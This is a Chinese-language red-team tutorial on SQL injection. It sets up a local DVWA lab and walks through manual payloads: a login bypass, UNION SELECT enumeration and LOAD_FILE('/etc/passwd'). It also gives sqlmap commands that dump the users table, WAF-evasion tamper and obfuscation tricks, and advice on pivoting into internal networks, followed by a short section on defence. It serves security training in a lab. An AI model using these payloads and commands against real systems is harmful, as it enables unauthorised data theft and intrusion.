一、SQL注入：解锁数据库的秘密通道

SQL注入（SQL Injection）是一种非常经典的攻击技术，它利用目标应用程序在处理用户输入时对SQL语句的拼接操作缺乏充分的过滤和验证，攻击者可以通过恶意构造的输入直接操控后台数据库，最终实现数据窃取、权限提升甚至服务器控制。作为红队，我喜欢称它为「数据库里的后门」，一个优秀的SQL注入攻击不仅仅是获取数据，还能成为进入内网的跳板。

攻击原理剖析

SQL注入的核心问题在于应用程序对用户输入的信任。我们可以通过拼接的方式直接篡改SQL查询结构，执行任意的SQL指令。以下是一个简单的例子：

<pre><code class="language-sql"># 原本的查询语句： SELECT * FROM users WHERE username = &#039;admin&#039; AND password = &#039;123456&#039;;

当输入被拼接为SQL语句后：

SELECT * FROM users WHERE username = &#039;admin&#039; AND password = &#039;123456&#039; OR &#039;1&#039;=&#039;1&#039;;</code></pre>

上面的例子中，攻击者通过添加 OR '1'='1' 强行使条件变为永真，从而绕过了密码验证机制。这种注入技巧可以进一步延展到数据读取、文件写入、系统命令执行等高级操作。

常见的注入类型

• 基于错误的注入：通过触发数据库错误信息获取数据库结构。
• 联合查询注入：利用 UNION SELECT 关键字合并查询结果。
• 盲注：没有直接返回数据，通过布尔逻辑或时间延迟判断结果。
• 二次注入：用户输入被存储后再被程序读取时发生注入。

---

二、搭建你的实验室：实战环境起步

作为红队，模拟真实环境是不可或缺的一环。接下来我们将搭建一个简单的SQL注入实验环境，基于Docker快速部署目标漏洞应用和数据库。

环境准备

工具清单：

• Docker (容器化平台)
• DVWA (漏洞演示应用)
• Kali Linux (攻击机)

实验室部署步骤

1. 下载DVWA镜像：

<pre><code class="language-bash"> docker pull vulnerables/web-dvwa `

1. 启动DVWA容器：

`bash docker run -d -p 8080:80 vulnerables/web-dvwa `

1. 配置数据库：

• 访问 http://localhost:8080
• 默认用户名和密码：admin / password
• 在页面设置中点击 Create / Reset Database 初始化数据库。

1. 准备攻击机：

• 启动Kali Linux。
• 安装常用SQL注入工具：

`bash apt update &amp;&amp; apt install sqlmap hydra -y `

至此，我们的实验环境已经就绪，下一步进入实战环节。

---

三、手动注入：从基础到复杂

作为一名红队，手动注入是掌握SQL注入技术的基础。虽然工具化能提升效率，但理解漏洞本质才是真正的技术提升。下面以DVWA为例，展示如何一点点攻破SQL防线。

基础注入：绕过登录验证

1. 在目标登录页面，尝试以下输入：

• 用户名：admin' OR '1'='1
• 密码：任意内容

1. 提交后观察是否成功登录。如果成功，则说明存在基本的SQL注入漏洞。

数据库操作：获取敏感信息

在登录页面发现漏洞后，可以尝试利用以下Payload获取数据库信息：</code></pre>sql ' UNION SELECT null, version(), database()-- - <pre><code>通过该语句，我们可以获取数据库版本和当前数据库名。

从数据到文件：利用LOAD_FILE读取文件

如果目标数据库支持 LOAD_FILE 函数，我们可以进一步读取服务器上的文件：</code></pre>sql ' UNION SELECT null, LOAD_FILE('/etc/passwd'), null-- - ` 这一操作可以用于挖掘敏感信息，比如用户权限或配置文件。

---

四、工具时代：SQLMap的深度用法

虽然手动注入是基本功，但在复杂环境中，工具化是红队不可或缺的法宝。接下来，我们将利用SQLMap自动化攻击目标。

SQLMap的基本参数

SQLMap是一款功能强大的注入工具，支持多类型数据库和多种注入方式。以下是常用参数：

• -u：指定目标URL。
• --dbs：枚举所有数据库。
• --tables：列出指定数据库的表。
• --dump：导出表数据。

实战过程

1. 目标URL（DVWA的登录页面）：

`bash sqlmap -u "http://localhost:8080/vulnerabilities/sqli/?id=1" --dbs `

1. 枚举数据库：

`bash sqlmap -u "http://localhost:8080/vulnerabilities/sqli/?id=1" -D dvwa --tables `

1. 导出用户数据：

`bash sqlmap -u "http://localhost:8080/vulnerabilities/sqli/?id=1" -D dvwa -T users --dump `

高级技巧：绕过安全机制

1. 使用代理伪装流量：

`bash sqlmap -u "http://localhost:8080/vulnerabilities/sqli/?id=1" --proxy "http://127.0.0.1:8080" `

2. 针对WAF的绕过：

• 使用编码绕过：

`bash sqlmap -u "http://localhost:8080/vulnerabilities/sqli/?id=1" --tamper "space2comment.py" `

---

五、攻与防的较量：绕过和对抗

绕过的艺术

在实际攻击中，目标通常会部署各种防护机制，比如WAF（Web应用防火墙）。以下是一些绕过技巧：

1. 字符变形：对关键字进行编码或混淆，如：

`sql SELECT//password//FROM/**/users; `

2. 多级注入：通过链式拼接绕过基本过滤规则：

`sql admin' AND (SELECT 1 UNION SELECT 2)-- - `

防御的思路

虽然本文重点在攻击思路，但作为红队，我们必须了解防御的核心原则，才能更好地设计绕过方案：

1. 参数化查询：使用Prepared Statements避免拼接问题。
2. 输入过滤：严格限制用户输入的内容和格式。
3. 数据库权限管理：最小化数据库用户的操作权限。

---

六、深度思考：红队的独门心法

SQL注入是一种经典漏洞，但它的价值远不止于数据窃取——它能成为红队进入内网的敲门砖。以下是我的一些个人经验分享：

1. 利用注入作为权限提升的跳板：结合文件读取和命令执行，将注入扩展到服务器层面。
2. 网络环境中的注入链设计：在内网中，通过注入连接不同的数据库系统，打通内部网络。
3. 工具与手工结合：工具化的目的是提升效率，但手动分析漏洞是红队的核心竞争力。

SQL注入攻防的较量是一场数字领域的博弈，掌握技术细节、理解攻击链条，才是成为顶级红队专家的必经之路。研究安全无止境，愿每一次注入都在合法授权的范围内，用技术驱动防御的进步。